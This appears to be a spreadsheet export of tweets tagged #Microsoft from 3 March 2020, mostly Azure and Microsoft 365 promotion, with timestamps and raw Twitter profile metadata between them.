    <t>{'id': 949283462, 'id_str': '949283462', 'name': 'Marek ZadÄ™cki', 'screen_name': 'MarekZadecki', 'location': 'Rzeczypospolita Polska', 'description': 'Åšwiat jest teatrem a czÅ‚owiek aktorem; Wchodzi na scenÄ™ i ze sceny schodzi;\r\nA Å¼ycie ludzkie - scenicznym utworem (...)\r\nW. Shakesperae', 'url': 'http://t.co/0GgPUhtqYg', 'entities': {'url': {'urls': [{'url': 'http://t.co/0GgPUhtqYg', 'expanded_url': 'http://superzarobek.wordpress.com', 'display_url': 'superzarobek.wordpress.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 106, 'friends_count': 88, 'listed_count': 2, 'created_at': 'Thu Nov 15 08:03:45 +0000 2012', 'favourites_count': 110, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 18112,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'http://pbs.twimg.com/profile_images/378800000561777047/8042bd5dca2d695254a9af56bfc990a7_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/378800000561777047/8042bd5dca2d695254a9af56bfc990a7_normal.jpeg',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</si>
  <si>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Tue Mar 03 17:35:29 +0000 2020</t>
  </si>
  <si>
    <t>Azure IoT Introduces seamless integration with Cisco IoT  https://t.co/R5wzDirpCt #Azure #Microsoft</t>
  </si>
  <si>
    <t>Tue Mar 03 17:34:49 +0000 2020</t>
  </si>
  <si>
    <t>@WANdisco #Blog: Moving DataLakes to the #Cloud does not need to be difficult or risky
#hadoop #datalake #databricks #spark #azure #azuredatabricks #aws #hybridcloud #kubernetes #datamigration #devops #cloudsecurity #microsoft https://t.co/UfgVAmZyGR</t>
  </si>
  <si>
    <t>{'id': 10977462, 'id_str': '10977462', 'name': 'David Richards', 'screen_name': 'davidrichards', 'location': 'San Francisco, CA ', 'description': 'Founder/CEO @WANdisco @technation Husband Dad ðŸ‡¬ðŸ‡§ðŸ‡ºðŸ‡¸#sheffield âš½ï¸ (#swfc) ðŸ â›³ï¸ ðŸ #Beekeeper #BigData #Cloud #Blockchain Family FoundationðŸ‘‰ https://t.co/ha4ayyDzci', 'url': 'https://t.co/Kf9LCrCN6p', 'entities': {'url': {'urls': [{'url': 'https://t.co/Kf9LCrCN6p', 'expanded_url': 'http://www.wandisco.com', 'display_url': 'wandisco.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/ha4ayyDzci', 'expanded_url': 'http://djrff.org', 'display_url': 'djrff.org', 'indices': [137, 160]}]}}, 'protected': False, 'followers_count': 1972, 'friends_count': 404, 'listed_count': 137, 'created_at': 'Sat Dec 08 19:37:16 +0000 2007', 'favourites_count': 2328, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 4429,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'http://pbs.twimg.com/profile_images/797592002900570112/-8ToFdOW_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/797592002900570112/-8ToFdOW_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/10977462/1478995690',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</si>
  <si>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17:34:09 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft 365 Business Consultant ready to work with SMB's. #Microsoft #SMB #SMBs #professionalITsupport #itsupport</t>
  </si>
  <si>
    <t>{'id': 2734563668, 'id_str': '2734563668', 'name': 'Dorrell Bunch', 'screen_name': 'BunchConsultant', 'location': 'Atlanta', 'description': 'SharePoint, Office 365, Security, Office and Home Networking Solutions Consultant', 'url': 'https://t.co/Tmwp9Rk91c', 'entities': {'url': {'urls': [{'url': 'https://t.co/Tmwp9Rk91c', 'expanded_url': 'https://www.bunchconsultingllc.com', 'display_url': 'bunchconsultingllc.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 0, 'friends_count': 0, 'listed_count': 0, 'created_at': 'Fri Aug 15 14:22:49 +0000 2014', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/1074762110209540096/_SwN3_kk_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1074762110209540096/_SwN3_kk_normal.jpg',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</si>
  <si>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17:31:04 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft : Expands Technology Partnership With the NFL #Microsoft #Stock #MarketScreener https://t.co/5HMz3erjEW https://t.co/MYpLwghYnj</t>
  </si>
  <si>
    <t>Tue Mar 03 17:30:52 +0000 2020</t>
  </si>
  <si>
    <t>#GoldPartner #Microsoft #Salesforce use #Prosci framework for #cloudadoption #accelerateadoption engaging leaders and end-users with #adkar - #getcertified in Neuchatel 25.-27.03. register here: https://t.co/MAa555e8y4  (3 training days, 2 overnight stays, meals, all included) https://t.co/Os8DHQN8Ug</t>
  </si>
  <si>
    <t>Tue Mar 03 17:30:02 +0000 2020</t>
  </si>
  <si>
    <t>Tue Mar 03 17:30:00 +0000 2020</t>
  </si>
  <si>
    <t>Did you know BDO is a #Microsoft Preferred Assessor for its Supplier Security and Privacy Assurance (SSPA) initiative? Learn how we help current and prospective Microsoft vendors meet SSPA program requirements as they initiate or renew contracts: https://t.co/ltLvQZ2YzK</t>
  </si>
  <si>
    <t>{'id': 2712083096, 'id_str': '2712083096', 'name': 'BDO USA, LLP', 'screen_name': 'BDO_USA', 'location': 'Chicago, IL', 'description': 'People Who Know, Know BDO. #accounting #tax #advisory #digital', 'url': 'https://t.co/kwkuoxQRS7', 'entities': {'url': {'urls': [{'url': 'https://t.co/kwkuoxQRS7', 'expanded_url': 'http://www.bdo.com', 'display_url': 'bdo.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 4430, 'friends_count': 698, 'listed_count': 120, 'created_at': 'Wed Aug 06 14:00:00 +0000 2014', 'favourites_count': 1129, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 4906,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'http://pbs.twimg.com/profile_images/1196895368878919680/IVfeoUAC_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1196895368878919680/IVfeoUAC_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2712083096/1579621754',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</si>
  <si>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We're rearchitecting everything at Microsoft now that we're fully in the #cloud.  #transformation #Azure #Microsoft https://t.co/d5sLT9YYNw</t>
  </si>
  <si>
    <t>Tue Mar 03 17:29:33 +0000 2020</t>
  </si>
  <si>
    <t>Azure IoT Introduces seamless integration with Cisco IoT  https://t.co/pzUqyMRnMU #Microsoft #Azure</t>
  </si>
  <si>
    <t>Tue Mar 03 17:28:02 +0000 2020</t>
  </si>
  <si>
    <t>Azure IoT Introduces seamless integration with Cisco IoT   https://t.co/ccpxg0B3Ws  #Azure #Microsoft #Cloud #azureflashnews</t>
  </si>
  <si>
    <t>Tue Mar 03 17:26:59 +0000 2020</t>
  </si>
  <si>
    <t>Workload Automation vs. Robotic Process Automation: which works best? https://t.co/Xs4WgoD82K #ActiveBatch #workloadautomation #robotic #RPA #WLA #TuesdayThoughts #Microsoft</t>
  </si>
  <si>
    <t>Tue Mar 03 17:26:04 +0000 2020</t>
  </si>
  <si>
    <t>Azure IoT Introduces seamless integration with Cisco IoT https://t.co/iEMC8A7egJ #CloudComputing #azureiot #cisco #ciscoiot #Microsoft</t>
  </si>
  <si>
    <t>{'id': 1213649975529201665, 'id_str': '1213649975529201665', 'name': 'iotnews.com', 'screen_name': 'Iotnews_com', 'location': 'Atlanta, GA USA', 'description': 'https://t.co/e0WraoQkKH \n#iot #internetofthings #automation #smarthome #iiot #cloud #AI', 'url': 'https://t.co/Bxt0S7jE5t', 'entities': {'url': {'urls': [{'url': 'https://t.co/Bxt0S7jE5t', 'expanded_url': 'https://iotnews.com', 'display_url': 'iotnews.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/e0WraoQkKH', 'expanded_url': 'http://iotNews.com', 'display_url': 'iotNews.com', 'indices': [0, 23]}]}}, 'protected': False, 'followers_count': 16, 'friends_count': 10, 'listed_count': 0, 'created_at': 'Sun Jan 05 02:34:52 +0000 2020', 'favourites_count': 7, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 194, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1214023521556406278/ZLJSi7mZ_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1214023521556406278/ZLJSi7mZ_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1213649975529201665/1580954357',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</si>
  <si>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17:24:46 +0000 2020</t>
  </si>
  <si>
    <t>Become a security focused CSP with Microsoft 365 Business https://t.co/JcJEVtwMFH #AzureAD #Microsoft</t>
  </si>
  <si>
    <t>Tue Mar 03 17:23:46 +0000 2020</t>
  </si>
  <si>
    <t>Azure IoT Introduces seamless integration with Cisco IoT   https://t.co/mLQ9GzAMDl  #azure #microsoft</t>
  </si>
  <si>
    <t>Tue Mar 03 17:23:12 +0000 2020</t>
  </si>
  <si>
    <t>Become a security focused CSP with Microsoft 365 Business https://t.co/fs7gK5z0Zr #Microsoft #IdentityManagement #AccessManagement</t>
  </si>
  <si>
    <t>Tue Mar 03 17:22:53 +0000 2020</t>
  </si>
  <si>
    <t>Refund scammer - (877) 568-1446 - #Scammer #Scambait #TSU #Refund #Scam #Info #Information #Windows #Microsoft - https://t.co/lR6W9FsC4D</t>
  </si>
  <si>
    <t>Tue Mar 03 17:22:35 +0000 2020</t>
  </si>
  <si>
    <t>#Azure Azure IoT Introduces seamless integration with Cisco IoT  https://t.co/vVTzl6ueBV #Microsoft</t>
  </si>
  <si>
    <t>Tue Mar 03 17:20:47 +0000 2020</t>
  </si>
  <si>
    <t>Azure IoT Introduces seamless integration with Cisco IoT  https://t.co/ibrfzz5Cuh  #Cloud #CloudComputing #Azure #Microsoft via Azure</t>
  </si>
  <si>
    <t>Tue Mar 03 17:20:08 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Ends Windows 7 Support: What Should You Do? Via @BBCTech https://t.co/2uri1zmJ6B https://t.co/S7v2CBD5iw</t>
  </si>
  <si>
    <t>Tue Mar 03 17:18:27 +0000 2020</t>
  </si>
  <si>
    <t>The new facilities allow Amazon to reduce same-day delivery times down to just a few hours for Prime members in those areas.
#Optimus #Business #Transformation #BeaGuru #DigitalTransformation #Office365 #PowerBi #Azure #Microsoft #Software #LinkedInTT #Caribbean #Intcomex</t>
  </si>
  <si>
    <t>Tue Mar 03 17:17:49 +0000 2020</t>
  </si>
  <si>
    <t>New blog post: Quick Assist the built-in Remote Control in Windows 10
...looking for a cheap built-in remote support solution, this might be interesting
#Microsoft #QuickAssist #RemoteControl #UAC #Windows10
https://t.co/2sfeW6ciZa</t>
  </si>
  <si>
    <t>Tue Mar 03 17:15:57 +0000 2020</t>
  </si>
  <si>
    <t>I see @Xbox has reduced the Game Pass Quest points by quite a lot, not worth doing now to be honest, I am no longer interested in Game Pass Quest's #Shame #Xbox #Microsoft</t>
  </si>
  <si>
    <t>{'id': 50806895, 'id_str': '50806895', 'name': 'Jasetheace105', 'screen_name': 'jasetheace1', 'location': 'Saturn', 'description': 'Gaming and sporting fanatic, lover of LFC &amp; Steelers, I will sell my soul to highest bidder ðŸ˜€\n\nXbox: jasetheace105\nPS4: jasetheace105\nNintendo: 1681-3430-4242', 'url': 'https://t.co/BTON0XTuHd', 'entities': {'url': {'urls': [{'url': 'https://t.co/BTON0XTuHd', 'expanded_url': 'https://www.instagram.com/jasetheace105/?hl=en', 'display_url': 'instagram.com/jasetheace105/â€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 289, 'friends_count': 641, 'listed_count': 5, 'created_at': 'Thu Jun 25 23:10:22 +0000 2009', 'favourites_count': 4502, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 4158,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'http://pbs.twimg.com/profile_images/1076879542013362176/nr8mjFEs_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1076879542013362176/nr8mjFEs_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/50806895/1535657092', 'profile_link_color': 'FAB81E',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</si>
  <si>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Tue Mar 03 17:14:43 +0000 2020</t>
  </si>
  <si>
    <t>Would you like to be between these legs? #Cleveland   #sougofollow #microsoft https://t.co/lwFaVxzzpJ</t>
  </si>
  <si>
    <t>{'id': 1234591193121595394, 'id_str': '1234591193121595394', 'name': 'Laura Bea', 'screen_name': 'purgamespe', 'location': 'Albuquerque, USA', 'description': 'When you realize you want to spend the rest of your life with somebody, you want the rest of your life to start as soon as possible.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 6, 'friends_count': 21, 'listed_count': 0, 'created_at': 'Mon Mar 02 21:27:38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'http://pbs.twimg.com/profile_images/1234620954048946177/toTxzSjQ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234620954048946177/toTxzSjQ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1234591193121595394/1583191584',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</si>
  <si>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17:14:16 +0000 2020</t>
  </si>
  <si>
    <t>"No one is asking for VR right now"
Yes because we all want to live in the past and not move forward into the new age a true immersion experience to set new standards for the future of gaming and life.
The shear blindness of Microsoft everyone...
#XboxSeriesX #Microsoft</t>
  </si>
  <si>
    <t>{'id': 1579136852, 'id_str': '1579136852', 'name': 'Nerd Meister 95', 'screen_name': 'dccomics94', 'location': '', 'description': 'Just talk...', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 270, 'friends_count': 646, 'listed_count': 4, 'created_at': 'Tue Jul 09 01:50:48 +0000 2013', 'favourites_count': 5685, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2879, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '03FF07', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme14/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme14/bg.gif', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1136777487910879232/OFXuLDkU_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1136777487910879232/OFXuLDkU_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1579136852/1559170490', 'profile_link_color': 'AA00FF',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</si>
  <si>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Tue Mar 03 17:13:20 +0000 2020</t>
  </si>
  <si>
    <t>If you are having issues with you Azure VM's in East US there's an issue going on, you can follow updates here:
https://t.co/D16Oy3RbRN
#azure #virtualmachines #sie #Microsoft #cloud #AKS</t>
  </si>
  <si>
    <t>{'id': 33596302, 'id_str': '33596302', 'name': 'Karina J', 'screen_name': 'hikaricr22', 'location': 'Costa Rica', 'description': 'Engineer, mom, kubernetes geek, gamer', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 43, 'friends_count': 45, 'listed_count': 1, 'created_at': 'Mon Apr 20 17:45:57 +0000 2009', 'favourites_count': 23, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 208, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '0099B9', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme11/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme11/bg.gif', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/761293288527634432/J4SXJzxO_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/761293288527634432/J4SXJzxO_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/33596302/1398118716', 'profile_link_color': '0099B9', 'profile_sidebar_border_color': '5ED4DC', 'profile_sidebar_fill_color': '112B6B', 'profile_text_color': 'BFE0F2', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Tue Mar 03 17:13:03 +0000 2020</t>
  </si>
  <si>
    <t>#ChinaUyghurs for sale: Report exposes forced #SlaveLabour beyond #Xinjiang implicating major #Tech brands  #Apple #Amazon #Cisco #Dell #Google #Hitachi #HP #LG #Microsoft #Nintendo #Nokia #Oculus #Panasonic #Samsung #Sharp #Siemens #Sony #Toshiba &amp;amp; more https://t.co/ynRfbllSot</t>
  </si>
  <si>
    <t>{'id': 85620067, 'id_str': '85620067', 'name': 'Gary DelPonte', 'screen_name': 'GaryDelPonte', 'location': 'New York City', 'description': 'Global UX UI Visual Designer. StoryTeller, Musician. Nature Improvisation HealthCare Aeronautics Fashion Financial Entertainment Photography BridgeBuilder', 'url': 'https://t.co/9wUNsHgKR0', 'entities': {'url': {'urls': [{'url': 'https://t.co/9wUNsHgKR0', 'expanded_url': 'https://garydelponte.com', 'display_url': 'garydelponte.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1361, 'friends_count': 1162, 'listed_count': 109, 'created_at': 'Tue Oct 27 17:43:13 +0000 2009', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 8808, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '020812', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme13/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme13/bg.gif', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/2845972980/462611ff69160667f4590168f7d2bbbc_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/2845972980/462611ff69160667f4590168f7d2bbbc_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/85620067/1355863817', 'profile_link_color': '17406C', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': '020812', 'profile_text_color': '2280A9', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Tue Mar 03 17:12:55 +0000 2020</t>
  </si>
  <si>
    <t>Love hearing #microsoft success stories with #azure and #cloud. Especially #financial services! They are always the slow movers. https://t.co/uZuInrxNMR</t>
  </si>
  <si>
    <t>Tue Mar 03 17:12:11 +0000 2020</t>
  </si>
  <si>
    <t>https://t.co/u0vDI3FP69 #microsoft #cloud #Internet of Things https://t.co/qa6KJbLAS4</t>
  </si>
  <si>
    <t>Tue Mar 03 17:11:48 +0000 2020</t>
  </si>
  <si>
    <t>#Azure #IoT Introduces seamless #Integration with Cisco IoT . #Microsoft #Cloud #MSFTadvocate #InternetOfThings
https://t.co/aashm6p3oS</t>
  </si>
  <si>
    <t>Tue Mar 03 17:11:28 +0000 2020</t>
  </si>
  <si>
    <t>Azure IoT Introduces seamless integration with Cisco IoT 
#Microsoft #Azure
https://t.co/nvCZG3gY4x</t>
  </si>
  <si>
    <t>Tue Mar 03 17:10:32 +0000 2020</t>
  </si>
  <si>
    <t>Azure IoT Introduces seamless integration with Cisco IoT https://t.co/PVZU9DKgHy #Microsoft #Azure #Cloud</t>
  </si>
  <si>
    <t>Tue Mar 03 17:10:10 +0000 2020</t>
  </si>
  <si>
    <t>Azure IoT Introduces seamless integration with Cisco IoT  https://t.co/UXtPCUjPwL #Microsoft #Azure</t>
  </si>
  <si>
    <t>Tue Mar 03 17:09:36 +0000 2020</t>
  </si>
  <si>
    <t>Stay strong in this crazy world
#xbox #xboxone #masterchief #halo5 #microsoft #guns #2ndamendment #america #pyrography #marijuana #maryjane #cannabis #gamerguy #gamer #gamer4life #destinythegame... https://t.co/BbUJsq6XWj</t>
  </si>
  <si>
    <t>Tue Mar 03 17:08:43 +0000 2020</t>
  </si>
  <si>
    <t>Blog: Part 3 of our #CreateTeam Blog series walks through the features of the App, and how it can help organizations ensure that users can make optimal use of #Microsoft Teams for collaboration. Read more. | https://t.co/P1C2SWs0lr https://t.co/d4Xa3ljJub</t>
  </si>
  <si>
    <t>Tue Mar 03 17:08:15 +0000 2020</t>
  </si>
  <si>
    <t>Azure IoT Introduces seamless integration with Cisco IoT  https://t.co/n4F7UZChOy #Azure #Microsoft</t>
  </si>
  <si>
    <t>Tue Mar 03 17:06:18 +0000 2020</t>
  </si>
  <si>
    <t>#Azure IoT Introduces seamless integration with Cisco IoT https://t.co/5VoS1ipQE7 via @hybrid_ts #Microsoft https://t.co/dfiLeORb6A</t>
  </si>
  <si>
    <t>Tue Mar 03 17:06:05 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Azure is a public cloud platform that enables you to build, deploy, scale and manage servers, services and applications across a global network of data centers.
Learn more: https://t.co/1oQiDLwUQV
#azure #azureactivedirectory #microsoft #microsoftazure #datalinknetworks https://t.co/wb3hZTm47J</t>
  </si>
  <si>
    <t>Tue Mar 03 17:05:09 +0000 2020</t>
  </si>
  <si>
    <t>Azure IoT Introduces seamless integration with Cisco IoT
- https://t.co/kWY3F21xsp
#Azure #Microsoft #Cloud #IoT #Cisco https://t.co/1RF7dn1shX</t>
  </si>
  <si>
    <t>Tue Mar 03 17:05:05 +0000 2020</t>
  </si>
  <si>
    <t>How can you help students tackle the complex challenges of tomorrow? See how educators are transforming learning through student-centered approaches. #EducationalTechnology #K12 #MicrosoftEducation #Microsoft https://t.co/Qd3MZrmICL</t>
  </si>
  <si>
    <t>Tue Mar 03 17:04:21 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Information Protection SDK 1.5: Now Available ! https://t.co/odsp0oLGkW #Security #protection #SDK #Developers https://t.co/LyOFEpKaT0</t>
  </si>
  <si>
    <t>Tue Mar 03 17:03:57 +0000 2020</t>
  </si>
  <si>
    <t>Azure IoT Introduces seamless integration with Cisco IoT   https://t.co/TFy63HLSv7 #Microsoft #Azure #AzureFamily</t>
  </si>
  <si>
    <t>Tue Mar 03 17:03:38 +0000 2020</t>
  </si>
  <si>
    <t>I particularly like this #Microsoft Customer Story!  
You had me at #wine and #MicrosoftTeams! 
#Microsoft365 #collaboration #Azure #SoGrape
https://t.co/jorVDXQ39N</t>
  </si>
  <si>
    <t>{'id': 22949754, 'id_str': '22949754', 'name': 'Tammy ðŸ‘©\u200dðŸ’»', 'screen_name': 'TammySchwark', 'location': 'ðŸ‡¨ðŸ‡¦', 'description': '#ITPro | Consultant passionate about tech &amp; making lives easier! #Microsoft365 #TeamsByTammy ðŸ’œ + #furrykiddies #skiing #travel #wine ðŸ˜œ #itsabalance âš–ðŸ¦¸\u200dâ™€ï¸', 'url': 'https://t.co/S87J2mhRd8', 'entities': {'url': {'urls': [{'url': 'https://t.co/S87J2mhRd8', 'expanded_url': 'https://www.linkedin.com/in/tammyschwark/', 'display_url': 'linkedin.com/in/tammyschwarâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 355, 'friends_count': 785, 'listed_count': 6, 'created_at': 'Thu Mar 05 17:43:10 +0000 2009', 'favourites_count': 1951, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1452, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '050505', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme14/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme14/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1218776016203722752/4GDDt_CI_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1218776016203722752/4GDDt_CI_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/22949754/1575682543', 'profile_link_color': '5558AF', 'profile_sidebar_border_color': '000000', 'profile_sidebar_fill_color': '57539F', 'profile_text_color': '222222', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Tue Mar 03 17:02:36 +0000 2020</t>
  </si>
  <si>
    <t>The top 5 technologies that will change health care over the next decade
https://t.co/wSGm4uFgjq
#sdoh #socialdeterminantsofhealth #gohealthhero #pophealth #health #wellbeing #valuebased #healthit #salesforce #cerner #epic #microsoft #Z55 #Z65</t>
  </si>
  <si>
    <t>Tue Mar 03 17:01:08 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft and #NFL expand tech partnership, adding Teams collaboration tool to the alliance https://t.co/1jfuVz841r</t>
  </si>
  <si>
    <t>Tue Mar 03 17:00:55 +0000 2020</t>
  </si>
  <si>
    <t>Which cloud platform works best for you? Cant decide? Check out this InfoBlog to choose the right fit. Link- https://t.co/dKJ2H3MOie
#BigData #DevOps #Analytics #SaaS #CloudComputing #tech #Microsoft #AWS #cloud #Azure https://t.co/0xKwARNfJo</t>
  </si>
  <si>
    <t>Tue Mar 03 17:00:38 +0000 2020</t>
  </si>
  <si>
    <t>Business Central Device License Capabilities &amp;amp; When to Use 
https://t.co/Yeso1Q3tNk
#MSDyn365bc #Microsoft #Licensing</t>
  </si>
  <si>
    <t>Tue Mar 03 17:00:16 +0000 2020</t>
  </si>
  <si>
    <t>My personal website. Senior Software Engineer. Specialized in #Microsoft Technologies including #dotnet #dotnetcore &amp;amp; #Azure 
https://t.co/bXH8SPnIBs https://t.co/5N32YKHd8g</t>
  </si>
  <si>
    <t>Tue Mar 03 17:00:05 +0000 2020</t>
  </si>
  <si>
    <t>What do Cisco Webex, Football, and RuPaul Have in Common? https://t.co/MswogyI8J1
For more info: https://t.co/8zr6oGjDg8 #data #security #bigdata #Digitaltransformation #finance #cloud #cybersecurity #CEO #cmo #digital #marketing #microsoft #IOT #internetofthings #dell #cto https://t.co/jBJdYQFMke</t>
  </si>
  <si>
    <t>Tue Mar 03 16:59:31 +0000 2020</t>
  </si>
  <si>
    <t>Lets' get started! @LI_Learning_DE!
#linkedinlearning #cloudinfrastructure #microsoftazure #azure #microsoft #azurecertification #visualstudio #azurevm #microsoftexam #azuresupport
https://t.co/7RH7QrAzSx</t>
  </si>
  <si>
    <t>Tue Mar 03 16:57:11 +0000 2020</t>
  </si>
  <si>
    <t>SQL Server AlwaysOn - Summary https://t.co/peVp98aw2A #Microsoft</t>
  </si>
  <si>
    <t>Tue Mar 03 16:55:07 +0000 2020</t>
  </si>
  <si>
    <t>#mustRead series of articles about #ZeroTrust
[Article] Protecting Cloud Workloads for Zero Trust with Azure Security Center (2 of 6)
https://t.co/x31SNg3p7G
#Identity #Microsoft #MFA #ConditionalAccess #CyberSecurity https://t.co/mZhzq4my1I</t>
  </si>
  <si>
    <t>Tue Mar 03 16:53:14 +0000 2020</t>
  </si>
  <si>
    <t>Fantastic #microsoft teams developer content from my great friend, peer, and mentor Bob German #microsoftteams https://t.co/tRAPDDZtqQ</t>
  </si>
  <si>
    <t>Tue Mar 03 16:52:33 +0000 2020</t>
  </si>
  <si>
    <t>An update to Microsoft certifications: MCSA, MCSD, and MCSE retiring end of June 2020 - Jussi Roine https://t.co/gsBObFuOew #microsoft</t>
  </si>
  <si>
    <t>Tue Mar 03 16:51:27 +0000 2020</t>
  </si>
  <si>
    <t>@Azure and @awscloud tip:
#Microsoft #MicrosoftAzure #Azure #Amazon #linkedinlearning
https://t.co/ZcEbaNohQm</t>
  </si>
  <si>
    <t>integration service MSSQL error the assembly may not be trusted with PERMISSION_SET = EXTERNAL_ACCESS or UNSAFE
#mssql #SQLServer #Microsoft #bigdata #tech #data #IT #cloud #Azure #dataprotection #SQL #MSSQL2019 #SQLServer2019
https://t.co/RBiz3Ve6zY</t>
  </si>
  <si>
    <t>{'id': 782612100006805504, 'id_str': '782612100006805504', 'name': 'sql server warrior', 'screen_name': 'sqlserverwarrio', 'location': '', 'description': 'official account for SQL Server Warrior Blog , Microsoft Technology is the BEST !', 'url': 'https://t.co/5MafQtLmEn', 'entities': {'url': {'urls': [{'url': 'https://t.co/5MafQtLmEn', 'expanded_url': 'https://sqlserverwarrior.wordpress.com/', 'display_url': 'sqlserverwarrior.wordpress.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 40, 'friends_count': 82, 'listed_count': 15, 'created_at': 'Sun Oct 02 16:03:59 +0000 2016', 'favourites_count': 85, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 467,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'http://pbs.twimg.com/profile_images/782613237011517440/QFSGIWVN_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/782613237011517440/QFSGIWVN_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/782612100006805504/1475424591',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</si>
  <si>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16:51:14 +0000 2020</t>
  </si>
  <si>
    <t>#Microsofts #AzureSphere is now available to all: https://t.co/xKDJARFjmG</t>
  </si>
  <si>
